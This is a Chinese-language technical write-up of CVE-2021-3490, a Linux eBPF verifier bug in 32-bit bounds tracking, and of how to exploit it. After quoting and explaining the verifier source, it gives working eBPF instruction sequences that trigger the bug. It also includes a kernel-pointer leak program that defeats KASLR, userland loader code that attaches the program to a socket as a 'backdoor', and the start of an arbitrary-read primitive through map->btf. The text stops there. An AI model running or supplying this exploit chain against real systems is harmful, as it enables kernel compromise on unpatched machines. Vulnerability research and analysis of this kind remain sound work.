eBPF漏洞CVE-2021-3490分析与利用

漏洞分析

verifier为了跟踪每一个寄存器的边界值(防止越界读写),会对寄存器的每一次运算模拟求解边界值(最大/最小值)。由于寄存器是64bits,但是实际参与运算的可能只是32bits,因此会对32/64位都进行边界校验,由adjust_scalar_min_max_vals和adjust_reg_min_max_vals函数完成。

/* WARNING: This function does calculations on 64-bit values, but the actual
 * execution may occur on 32-bit values. Therefore, things like bitshifts
 * need extra checks in the 32-bit case.
 */
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                      struct bpf_insn *insn,
                      struct bpf_reg_state *dst_reg,
                      struct bpf_reg_state src_reg)
{
    struct bpf_reg_state *regs = cur_regs(env);
    u8 opcode = BPF_OP(insn->code);
    ...
    switch (opcode) {
    case BPF_ADD:
        ret = sanitize_val_alu(env, insn);
        if (ret < 0) {
            verbose(env, "R%d tried to add from different pointers or scalars\n", dst);
            return ret;
        }
        scalar32_min_max_add(dst_reg, &src_reg);
        scalar_min_max_add(dst_reg, &src_reg);
        dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
        break;
    case BPF_SUB:
        ret = sanitize_val_alu(env, insn);
        if (ret < 0) {
            verbose(env, "R%d tried to sub from different pointers or scalars\n", dst);
            return ret;
        }
        scalar32_min_max_sub(dst_reg, &src_reg);
        scalar_min_max_sub(dst_reg, &src_reg);
        dst_reg->var_off = tnum_sub(dst_reg->var_off, src_reg.var_off);
        break;
    case BPF_MUL:
        dst_reg->var_off = tnum_mul(dst_reg->var_off, src_reg.var_off);
        scalar32_min_max_mul(dst_reg, &src_reg);
        scalar_min_max_mul(dst_reg, &src_reg);
        break;
    case BPF_AND:
        dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
        scalar32_min_max_and(dst_reg, &src_reg);
        scalar_min_max_and(dst_reg, &src_reg);
        break;
    case BPF_OR:
        dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
        scalar32_min_max_or(dst_reg, &src_reg);
        scalar_min_max_or(dst_reg, &src_reg);
        break;
    case BPF_LSH:
        if (umax_val >= insn_bitness) {
            /* Shifts greater than 31 or 63 are undefined.
             * This includes shifts by a negative number.
             */
            mark_reg_unknown(env, regs, insn->dst_reg);
            break;
        }
        if (alu32)
            scalar32_min_max_lsh(dst_reg, &src_reg);
        else
            scalar_min_max_lsh(dst_reg, &src_reg);
        break;
    case BPF_RSH:
        if (umax_val >= insn_bitness) {
            /* Shifts greater than 31 or 63 are undefined.
             * This includes shifts by a negative number.
             */
            mark_reg_unknown(env, regs, insn->dst_reg);
            break;
        }
        if (alu32)
            scalar32_min_max_rsh(dst_reg, &src_reg);
        else
            scalar_min_max_rsh(dst_reg, &src_reg);
        break;
    case BPF_ARSH:
        if (umax_val >= insn_bitness) {
            /* Shifts greater than 31 or 63 are undefined.
             * This includes shifts by a negative number.
             */
            mark_reg_unknown(env, regs, insn->dst_reg);
            break;
        }
        if (alu32)
            scalar32_min_max_arsh(dst_reg, &src_reg);
        else
            scalar_min_max_arsh(dst_reg, &src_reg);
        break;
    default:
        mark_reg_unknown(env, regs, insn->dst_reg);
        break;
    }

    /* ALU32 ops are zero extended into 64bit register */
    if (alu32)
        zext_32_to_64(dst_reg);

    __update_reg_bounds(dst_reg);
    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;
}

漏洞就出现在32bit的BPF_AND/BPF_OR/BPF_XOR运算上

static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
                 struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_subreg_is_const(src_reg->var_off);
    bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
    struct tnum var32_off = tnum_subreg(dst_reg->var_off);
    s32 smin_val = src_reg->s32_min_value;
    u32 umax_val = src_reg->u32_max_value;

    /* Assuming scalar64_min_max_and will be called so its safe
     * to skip updating register for known 32-bit case.
     */
    if (src_known && dst_known)
        return;
    ...
}

上面的代码说明当32bit 源寄存器和目的寄存器的值都是known的时候,就不更新32bit的边界值。注释说明在这种情况下scalar64_min_max_and会处理。

static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
                   struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_is_const(src_reg->var_off);
    bool dst_known = tnum_is_const(dst_reg->var_off);
    s64 smin_val = src_reg->smin_value;
    u64 umax_val = src_reg->umax_value;

    if (src_known && dst_known) {
        __mark_reg_known(dst_reg, dst_reg->var_off.value &
                      src_reg->var_off.value);
        return;
    }
    ...
}

在64bit边界值校验中,在源和目的寄存器都是known的情况下,会调用__mark_reg_known函数。

但是这里有一个区别

  • 在scalar32_min_max_and中用的tnum_subreg_is_const校验寄存器的低32位是否是known;
  • 在scalar_min_max_and中用的tnum_is_const校验寄存器的64位是否是known

这里就有一个例外的情况,即一个reg的低32位是known,高32位是unknown。在这种情况下,__mark_reg32_known函数没有被调用,该函数会将寄存器的低32位设置为常数。

/* Record that the 32-bit subregister of @reg holds the constant @imm.
 *
 * var_off is replaced by the result of tnum_const_subreg(reg->var_off, imm),
 * and all four 32-bit bounds (signed min/max, unsigned min/max) are set to
 * @imm truncated to 32 bits, so min == max afterwards.
 * The 64-bit bounds of @reg are not touched here.
 */
static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
    reg->var_off = tnum_const_subreg(reg->var_off, imm);
    reg->s32_min_value = (s32)imm;
    reg->s32_max_value = (s32)imm;
    reg->u32_min_value = (u32)imm;
    reg->u32_max_value = (u32)imm;
}

在adjust_scalar_min_max_vals函数返回前,调用了下面三个函数更新寄存器的边界值

__update_reg_bounds(dst_reg);
    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;

它们都有32/64两种实现,漏洞出现在32的实现中,我们只关注这一部分。

__update_reg32_bounds函数根据reg.var_off计算边界值

  • 最小值:当前寄存器的最小值/已知的常数值(known)
  • 最大值:当前寄存器的最大值/已知的常数值(known)
/* Tighten the 32-bit bounds of @reg using its tracked bits (var_off).
 *
 * Each bound is only ever narrowed: a minimum becomes the larger of the old
 * minimum and the value derived from var_off, a maximum becomes the smaller
 * of the old maximum and the value derived from var_off.  Because the old
 * bounds are kept as one operand, stale bounds that disagree with var_off
 * can end up with min > max.
 */
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
    /* Low 32 bits of the tracked number. */
    struct tnum var32_off = tnum_subreg(reg->var_off);

    /* min signed is max(sign bit) | min(other bits) */
    reg->s32_min_value = max_t(s32, reg->s32_min_value,
            var32_off.value | (var32_off.mask & S32_MIN));
    /* max signed is min(sign bit) | max(other bits) */
    reg->s32_max_value = min_t(s32, reg->s32_max_value,
            var32_off.value | (var32_off.mask & S32_MAX));
    /* min unsigned: all unknown bits cleared. */
    reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
    /* max unsigned: all unknown bits set. */
    reg->u32_max_value = min(reg->u32_max_value,
                 (u32)(var32_off.value | var32_off.mask));
}

使用signed的最大/小值订正unsigned的边界值;反之也可以

/* Uses signed min/max values to inform unsigned, and vice-versa.
 *
 * Works only on the 32-bit bounds of @reg.  Three cases are handled; if none
 * of them applies the bounds are left unchanged.
 */
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
    /* Learn sign from signed bounds.
     * If we cannot cross the sign boundary, then signed and unsigned bounds
     * are the same, so combine.  This works even in the negative case, e.g.
     * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
     */
    if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
        /* Both views get the tighter min and the tighter max. */
        reg->s32_min_value = reg->u32_min_value =
            max_t(u32, reg->s32_min_value, reg->u32_min_value);
        reg->s32_max_value = reg->u32_max_value =
            min_t(u32, reg->s32_max_value, reg->u32_max_value);
        return;
    }
    /* Learn sign from unsigned bounds.  Signed bounds cross the sign
     * boundary, so we must be careful.
     */
    if ((s32)reg->u32_max_value >= 0) {
        /* Positive.  We can't learn anything from the smin, but smax
         * is positive, hence safe.
         */
        reg->s32_min_value = reg->u32_min_value;
        reg->s32_max_value = reg->u32_max_value =
            min_t(u32, reg->s32_max_value, reg->u32_max_value);
    } else if ((s32)reg->u32_min_value < 0) {
        /* Negative.  We can't learn anything from the smax, but smin
         * is negative, hence safe.
         */
        reg->s32_min_value = reg->u32_min_value =
            max_t(u32, reg->s32_min_value, reg->u32_min_value);
        reg->s32_max_value = reg->u32_max_value;
    }
}

最后,调用__reg_bound_offset更新var_off

/* Attempts to improve var_off based on unsigned min/max information.
 *
 * Two candidates are computed independently: a 64-bit one from
 * [umin_value, umax_value] and a 32-bit one from
 * [u32_min_value, u32_max_value].  Each is the intersection of the current
 * var_off (or its subregister part) with the tnum built from that range.
 */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
    struct tnum var64_off = tnum_intersect(reg->var_off,
                           tnum_range(reg->umin_value,
                              reg->umax_value));
    struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
                        tnum_range(reg->u32_min_value,
                               reg->u32_max_value));

    /* Combine: 64-bit candidate with its subregister part cleared,
     * OR-ed with the 32-bit candidate.
     */
    reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}
  • tnum_range根据给定的[umin_value, umax_value]范围值,返回一个tnum
  • tnum_intersect将两个已知的tnum合并为1个tnum(区间合并,取交集)

这里可以举一个实例以助理解上述过程存在的问题。

R2.var_off = {mask = 0xffffffff00000000, value = 0x01}; 即低32bits是known, 高32bits是unknown.
R3.var_off = {mask = 0x0, value = 0x100000002}; 即整个64bits是known的,值为0x100000002;

对于BPF_AND(R2, R3)运算,R2的边界值变化如下

  • tnum_and

    u64 alpha = r2.mask | r2.value = 0xffffffff00000001
    u64 beta  = r3.mask | r3.value = 0x100000002
    u64 v = r2.value & r3.value
    
    ret = TNUM(v, alpha & beta & ~v)
    ret = {mask = 0x100000000, value = 0x0}
    

    R2.var_off = {mask = 0x100000000, value = 0x0}

  • scalar32_min_max_and不会更改R2的边界值,这是因为R2和R3的低32bit都是known

  • __update_reg32_bounds

    R2.u32_min_value = R2.u32_max_value = 1;      // 进入函数前的常数值
    
    // 进入函数之后
    u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value)
                = max(1, 0) = 1;
    u32_max_value = min(reg->u32_max_value,
                   (u32)(var32_off.value | var32_off.mask));
                = min(1, 0) = 0;
    对于s32_min_value/max_value也是一样的
  • 接下来的__reg32_deduce_bounds和__reg_bound_offset不会对R2的边界值产生影响

即在这种情况下我们得到的R2最小值是1,最大值是0.

这显然是不合理的,而根本原因就在于在scalar32_min_max_and函数中,没有调用__mark_reg32_known更新u/s32_min/max_value,这也是后来的fix方案

Exploitation

上述例子就是漏洞触发的路径,构造两个寄存器

R2.var_off = {mask = 0xffffffff00000000, value = 0x01}; 即低32bits是known, 高32bits是unknown.
R3.var_off = {mask = 0x0, value = 0x100000002}; 即整个64bits是known的,值为0x100000002;

第二个相对更容易构造,因为所有的bit都是known的,直接可以赋值,但是由于指令的限制,我们只能用32bits运算

BPF_LD_IMM64(BPF_REG_8, 0x1);                   // r8 = 0x1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32);          // r8 <<= 32    == 0x1_0000_0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2);           // r8 += 2      == 0x1_0000_0002

对于第一个,要获得mask=0xffffffff00000000,可以先得到一个在verifier看来完全unknown的值,此时mask=0xffffffffffffffff;最直接的方法就是从map中取一个值。并且这种方法允许我们在运行时控制map的实际值,便于利用。

// Load a pointer to the map (from mapfd) into R9, then copy it to R1
        BPF_LD_MAP_FD(BPF_REG_9, mapfd);
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9);            // r1 = r9 (map pointer)

        // R2 = stack_ptr - 4
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10);
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4);

        // Store the key 0 at stack_ptr - 4, i.e. *(u32 *)r2 = 0
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0);

        // Call the helper map_lookup_elem: first argument is R1 (map pointer),
        // second argument is R2 (pointer to the element index, here 0).
        // A helper call is encoded with the BPF_JMP instruction class;
        // BPF_JNE is a jump opcode, not a class, so it must not be used here.
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem);

调用map_lookup_elem(mapfd, 0),将得到mapfd第一个elem,返回值在R0中。

BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_0, 0);

上述过程可以封装为一个BPF_MAP_GET(获取mapfd的指定elem)

/*
 * BPF_MAP_GET(idx, dst): instruction sequence that loads the 64-bit value
 * stored under key `idx` into register `dst`.
 *
 *   r1 = r9; r2 = r10 - 4; *(u32 *)(r10 - 4) = idx;
 *   r0 = map_lookup_elem(r1, r2); if r0 == 0, exit the program;
 *   dst = *(u64 *)(r0 + 0); r0 = 0
 *
 * Expects r9 to already hold the map pointer (e.g. from BPF_LD_MAP_FD).
 * Writes r0, r1, r2 and the 4 bytes at r10 - 4.
 */
#define BPF_MAP_GET(idx, dst)                                                \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                                     \
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                \
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                               \
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                              \
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                               \
        BPF_EXIT_INSN(),                                                     \
        BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0),                              \
        BPF_MOV64_IMM(BPF_REG_0, 0)

由于BPF_REG_5来自map,完全由用户态控制,对于verifier,它是完全unknown的,即{mask=0xffffffffffffffff, value=0x0};接下来我们需要将其低32bit设为known,可以and一个已知的常数值0xffffffff00000000来构造。

BPF_MAP_GET(0, BPF_REG_5);                      // r5 = map.elem[0]
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_5);            // r6 = r5

        BPF_MOV64_IMM(BPF_REG_2, 0xffffffff);           // r2 = 0xffffffff
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32);          // r2 <<= 32    == 0xffffffff 00000000
        // The mask lives in a register, so the register-source form is
        // required; BPF_ALU64_IMM would treat BPF_REG_2 as an immediate.
        BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_2);   // r6 &= r2   ; high 32 unknown, low 32 known

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x1);         // r6.var_off = {mask=0xffffffff 00000000, value=0x01}

通过上述构造的两个寄存器的AND运算即可触发漏洞

//  Trigger the vuln
        // r8 is a register operand, so the register-source ALU form is needed.
        BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8);       // r6 &= r8;    r6.u32_min_value=0x1; r6.u32_max_value=0x0

此时r6低32位的真实值是0x2 & 0x1 == 0x0

Path confusion

verifier在模拟执行bpf code时,遇到有条件分支,为了避免分支爆炸问题,会尝试根据寄存器的边界值,判断该条件分支是否只会走唯一的一条路径。

例如

BPF_JMP32_IMM(BPF_JGE, BPF_REG_6, 1, 5);

表示,如果BPF_REG_6的低32bit值大于等于1,将跳过接下来的5条指令。

对于JMP32,将由is_branch32_taken函数判断是否只有一条分支可走,其余分支可以抛弃。

static int is_branch32_taken(struct bpf_reg_state *reg, u32 val, u8 opcode)
{
    struct tnum subreg = tnum_subreg(reg->var_off);
    s32 sval = (s32)val;

    switch (opcode) {
    ....
    case BPF_JGE:
        if (reg->u32_min_value >= val)
            return 1;
        else if (reg->u32_max_value < val)
            return 0;
        break;
    ...
    case BPF_JLE:
        if (reg->u32_max_value <= val)
            return 1;
        else if (reg->u32_min_value > val)
            return 0;
        break;
    ...
    }
    return -1;
}

对于JGE,这里判断如果最小值已经满足条件(大于等于给定的比较值)后,就会返回TRUE;而不会去判断最大值的合法性。同样的对于BPF_JLE,先判断最大值是否满足条件(小于等于给定值);

配合上述构造的umin_value > umax_value的情况,此时永远会返回TRUE,但是在实际运行中,R6=0, 会运行到FALSE;造成路径的混淆。

这也就意味着理论上,我们可以将任意危险的代码藏在FALSE分支中,verifier不会对其进行安全性校验。

但是,事实上,verifier对于它认为永远不可达的代码(dead code)做了patch处理

/* Overwrite every instruction the verifier never marked as seen.
 *
 * Walks all env->prog->len instructions; any instruction whose
 * aux_data[i].seen is false is replaced in place by the trap instruction
 * below, and its zext_dst flag is cleared.
 */
static void sanitize_dead_code(struct bpf_verifier_env *env)
{
    struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
    /* Unconditional jump (BPF_JA) with offset -1. */
    struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
    struct bpf_insn *insn = env->prog->insnsi;
    const int insn_cnt = env->prog->len;
    int i;

    for (i = 0; i < insn_cnt; i++) {
        /* Reached during verification: keep as is. */
        if (aux_data[i].seen)
            continue;
        memcpy(insn + i, &trap, sizeof(trap));
        aux_data[i].zext_dst = false;
    }
}

这里的patch方案就是将所有dead code修改为JMP -1(BPF_JA,偏移为-1)。跳转目标按"下一条指令 + 偏移"计算,也就是该指令自身,这就意味着一旦执行到dead code,将在原地不断跳转,形成一个无止境的循环。

它之所以不会通过常见的nop方案去patch,是担心这些dead code位于程序尾,程序有可能越界执行。

不通过触发Exception的方式去处理,是因为subprog也可以定位到这些dead code

Info Leak

在verifier中会跟踪寄存器的状态,并且不允许将PTR的寄存器存储在map里或者作为返回值,防止泄露内核地址。

adjust_ptr_min_max_vals函数跟踪指针运算的边界

/* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off.
 * Caller should also handle BPF_MOV case separately.
 * If we return -EACCES, caller may want to try again treating pointer as a
 * scalar.  So we only emit a diagnostic if !env->allow_ptr_leaks.
 */
static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
                   struct bpf_insn *insn,
                   const struct bpf_reg_state *ptr_reg,
                   const struct bpf_reg_state *off_reg)
{
    struct bpf_verifier_state *vstate = env->cur_state;
    struct bpf_func_state *state = vstate->frame[vstate->curframe];
    struct bpf_reg_state *regs = state->regs, *dst_reg;
    bool known = tnum_is_const(off_reg->var_off);
    s64 smin_val = off_reg->smin_value, smax_val = off_reg->smax_value,
        smin_ptr = ptr_reg->smin_value, smax_ptr = ptr_reg->smax_value;
    u64 umin_val = off_reg->umin_value, umax_val = off_reg->umax_value,
        umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
    struct bpf_sanitize_info info = {};
    u8 opcode = BPF_OP(insn->code);
    u32 dst = insn->dst_reg;
    int ret;

    dst_reg = &regs[dst];

    if ((known && (smin_val != smax_val || umin_val != umax_val)) ||
        smin_val > smax_val || umin_val > umax_val) {
        /* Taint dst register if offset had invalid bounds derived from
         * e.g. dead branches.
         */
        __mark_reg_unknown(env, dst_reg);
        return 0;
    }

    ....
}

这里的dst_reg就是指针寄存器,off_reg是参与运算的scalar寄存器;

有一种特殊情况,即当off_reg是一个常量,且off_reg.umin_val > off_reg.umax_val时,dst_reg会被标记为unknown,即scalar寄存器。此时verifier不再认为dst_reg是一个指针类型,将允许把它存于map里;结合上述不合理情况的存在,可以造成内核地址信息泄漏。

而通过前面构造的两个寄存器,我们可以成功得到满足这个条件的寄存器。

接下来,为了获取kernel任意地址读写能力,我们需要构造一个原语,使某个寄存器满足这样的条件:verifier认为它的值为0,但实际运行时为1。

首先,对R6加1,相应的边界值都加1

BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1);// r6 += 1; .umin_value=0x2; umax_value=0x1;

之后,用一样的方法获取一个对于verifier是unknown的值(来自map),再通过JMP32更新其边界值

BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),           // r6 += 1; .umin_value=0x2; umax_value=0x1;
        // The jump opcode is BPF_JLE (there is no JMP_JLE).
        BPF_JMP32_IMM(BPF_JLE, BPF_REG_5, 1, 1),        // if (u32)r5 <= 1 goto pc+1;
            BPF_EXIT_INSN(),

由于运行时,R5的值来自map.elem[0],可控的,当R5=0时,JLE返回TRUE,将会跳过EXIT指令,并更新R5的边界为R5.var_off = {mask=0xffffffff00000001, value=0x0}。R5.umin_value = 0, umax_value = 0x1;

当R6和R5相加时,边界值再一次更新

BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_5),
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                      struct bpf_insn *insn,
                      struct bpf_reg_state *dst_reg,
                      struct bpf_reg_state src_reg)
{
    struct bpf_reg_state *regs = cur_regs(env);
    u8 opcode = BPF_OP(insn->code);
    ...
    switch (opcode) {
    case BPF_ADD:
        scalar32_min_max_add(dst_reg, &src_reg);
        scalar_min_max_add(dst_reg, &src_reg);
        dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
        break;
    ....
}

static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
                 struct bpf_reg_state *src_reg)
{
    ....
        if (dst_reg->u32_min_value + umin_val < umin_val ||
            dst_reg->u32_max_value + umax_val < umax_val) {
            dst_reg->u32_min_value = 0;
            dst_reg->u32_max_value = U32_MAX;
        }
        else {
        dst_reg->u32_min_value += umin_val;
        dst_reg->u32_max_value += umax_val;
    }
}

可以看到,在不会产生溢出的情况下,umin/umax_value只是dst和source相应的和。

也就是此时的R6.umin_value = umax_value = 0x2,此时verifier认为R6=0x2,而runtime下R6=0x1

之后,利用0x2 & 0x1 == 0x0,构造出verify: 0x0, runtime: 0x1的情况

BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1)        // verify: 0  runtime: 1

后续可以利用这一点完成越界读写。

泄漏内核地址

map里的内容并不是存储在动态分配的堆内存中,而是在bpf_array.value,而同在bpf_array中,存在一个有用的结构体bpf_map

/* Array-map object.  The generic struct bpf_map header is the first member;
 * the element storage is the trailing zero-length array inside the anonymous
 * union, so it lives in the same object, after the header fields.
 */
struct bpf_array {
    struct bpf_map map;
    u32 elem_size;
    u32 index_mask;
    struct bpf_array_aux *aux;
    /* Three 8-byte-aligned views of the same trailing storage. */
    union {
        char value[0] __aligned(8);             // map's content
        void *ptrs[0] __aligned(8);
        void __percpu *pptrs[0] __aligned(8);
    };
};

struct bpf_map {
    /* The first two cachelines with read-mostly members of which some
     * are also accessed in fast-path (e.g. ops, max_entries).
     */
    const struct bpf_map_ops *ops ____cacheline_aligned;
    struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
    void *security;
#endif
    enum bpf_map_type map_type;
    u32 key_size;
    u32 value_size;
    u32 max_entries;
    u64 map_extra; /* any per-map-type extra fields */
    u32 map_flags;
    int spin_lock_off; /* >=0 valid offset, <0 error */
    int timer_off; /* >=0 valid offset, <0 error */
    u32 id;
    int numa_node;
    u32 btf_key_type_id;
    u32 btf_value_type_id;
    u32 btf_vmlinux_value_type_id;
    struct btf *btf;
    ...
};

其中最重要的一个成员就是ops,它指向了一个虚拟函数表,取决于map的类型。

例如有array_map_ops/cpu_map_ops/dev_map_ops...,这些结构体都位于.rodata,并且在/proc/kallsyms中有对应的导出符号,泄漏这些地址可以用于绕过KASLR。

通过map_lookup_elem我们可以获取任意一个map里elem的地址,即bpf_array.value的地址,再通过偏移计算(&value[0] - 0x110)可以得到ops指针所在的地址。

下述代码可以将ops地址存储在map.elem[4]中

/*
 * Leak program: triggers the bounds bug on r6 (verifier believes 0, runtime
 * value is 1), then, when map.elem[1] == 0, reads the 8 bytes located 0x110
 * before &value[0] and stores them into map.elem[4].
 */
struct bpf_insn prog[] = {

        BPF_LD_MAP_FD(BPF_REG_9, mapfd),

        // {mask=0x0, value=0x100000002}
        BPF_LD_IMM64(BPF_REG_8, 0x1),                   // r8 = 0x1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),          // r8 <<= 32    == 0x1_0000_0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2),           // r8 += 2      == 0x1_0000_0002

        BPF_MAP_GET(0, BPF_REG_5),                      // r5 = map.elem[0]
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),            // r6 = r5

        BPF_MOV64_IMM(BPF_REG_2, 0xffffffff),           // r2 = 0xffffffff
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),          // r2 <<= 32    == 0xffffffff 00000000
        // register operand: must use the register-source form, not _IMM
        BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_2),   // r6 &= r2   ; high32 unknown, low 32 known

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x1),         // r6.var_off = {mask=0xffffffff 00000000, value=0x01}

        //  Trigger the vuln (register operand: register-source form)
        BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8),       // r6 &= r8;    r6.u32_min_value=0x1; r6.u32_max_value=0x0

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),           // r6 += 1; .umin_value=0x2; umax_value=0x1;
        BPF_JMP32_IMM(BPF_JLE, BPF_REG_5, 1, 1),        // if r5 <= 1 goto pc+1; 
            BPF_EXIT_INSN(),                            // r5.umin_value = 0x0, umax_value=0x1
            BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_5), // r6 +=r5 umin_value=umax_value=0x2
            // only take low 32 bits
            BPF_MOV32_REG(BPF_REG_6, BPF_REG_6),        // r6=r6    ; only low 32bits
            BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1),       // verify: 0  runtime: 1

        // read kaslr (op=0): the ops pointer is at &value[0] - 0x110
        BPF_MAP_GET(1, BPF_REG_7),                      // 30: (79) r7 = *(u64 *)(r0 +0)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 23),         // 32: (55) if r7 != 0x0 goto pc+23
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),       // 33: (27) r6 *= 272
        BPF_MAP_GET_ADDR(0, BPF_REG_7),                 // 41: (bf) r7 =map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=invP0 R8=invP0 R9=ma?
        BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),   // 43: (1f) r7 -= r6
        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),   // 44: (79) r8 = *(u64 *)(r7 +0)
        BPF_MAP_GET_ADDR(4, BPF_REG_6),                 
        BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_8, 0),   // 54: (7b) *(u64 *)(r6 +0) = r8
        BPF_EXIT_INSN(),

    BPF_EXIT_INSN(),
    };
触发eBPF code执行

最简单的就是创建一个BPF_PROG_TYPE_SOCKET_FILTER类型的bpf_prog,这样就可以在每一次写入socket操作,就可以触发一次eBPF代码执行

// write_msg() —— trigger to execute eBPF code
/*
 * Writes the global `buffer` to sockets[0]; the program attached to the peer
 * socket is expected to run once per write.
 *
 * Returns 0 when write() succeeds (a short write is only reported on
 * stderr), 1 when write() fails (the error is reported via perror()).
 */
int write_msg()
{
    ssize_t n = write(sockets[0], buffer, sizeof(buffer));
    if (n < 0)
    {
        perror("write");
        return 1;
    }
    /* n is known to be non-negative here, so the cast is lossless and
     * avoids a signed/unsigned comparison. */
    if ((size_t)n != sizeof(buffer))
    {
        /* n is an ssize_t: %zd is the matching conversion, %d is not. */
        fprintf(stderr, "short write: %zd\n", n);
    }
    return 0;
}

泄漏内核地址:

// Step 1: create eBPF code, verify and trigger the vulnerability
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 0x100);
    if (mapfd < 0)
    {
        fail("failed to create map '%s'\n", strerror(errno));
    }
    redact("sneaking evil bpf past the verifier\n");
    int progfd = load_prog();  // verify
    printf("%s\n", bpf_log_buf);
    if (progfd < 0)
    {
        if (errno == EACCES)
        {
            msg("log:\n%s", bpf_log_buf);
        }
        printf("%s\n", bpf_log_buf);
        fail("failed to load prog '%s'\n", strerror(errno));
    }

    redact("creating socketpair()\n");
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
    {
        fail("failed to create socket pair '%s'\n", strerror(errno));
    }

    redact("attaching bpf backdoor to socket\n");
    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
    {
        fail("setsockopt '%s'\n", strerror(errno));
    }

    // Step 2: leak kernel_base  (op=0)
    update_elem(0, 0);      // value[0]=0 (low 32 bits must be <= 1 to pass the JLE check)
    update_elem(1, 0);      // value[1]=0 selects op=0 (leak)
    size_t value = 0;
    write_msg();
    size_t ops_addr = get_elem(4);      // read back the value stored at value[4]
    // ops_addr is a size_t: %zx is the matching conversion, %llx is not.
    printf("leak addr: 0x%zx\n", ops_addr);
任意地址读

bpf_map中还有一个重要的结构体指针struct btf *btf,它指向一个包含调试信息的结构体。通常情况下,该指针是没有初始化的(NULL),也就提供了一个坑位,可以用于写入任意地址,并且不会对内核其他功能产生影响。

函数bpf_map_get_info_by_fd,有如下代码

if (map->btf) {
        info.btf_id = btf_obj_id(map->btf);
        info.btf_key_type_id = map->btf_key_type_id;
        info.btf_value_type_id = map->btf_value_type_id;
    }

即,当我们能越界把map->btf写成someaddr - offsetof(struct btf, id)时,info.btf_id将被写入*(someaddr)。由于btf_id类型是u32,这种方式每次可以读取任意地址处4 bytes的内容。

修改bpf_array->bpf_map->btf(&map + 0x40)为指定地址,利用bpf_map_get_info_by_fd可以泄漏btf->id(偏移&btf + 0x58)的四字节。

//eBPF code
        // write btf (op=1)     (write bpf_array->bpf_map->btf)
        BPF_JMP_IMM(BPF_JNE,BPF_REG_7,  1, 22),         
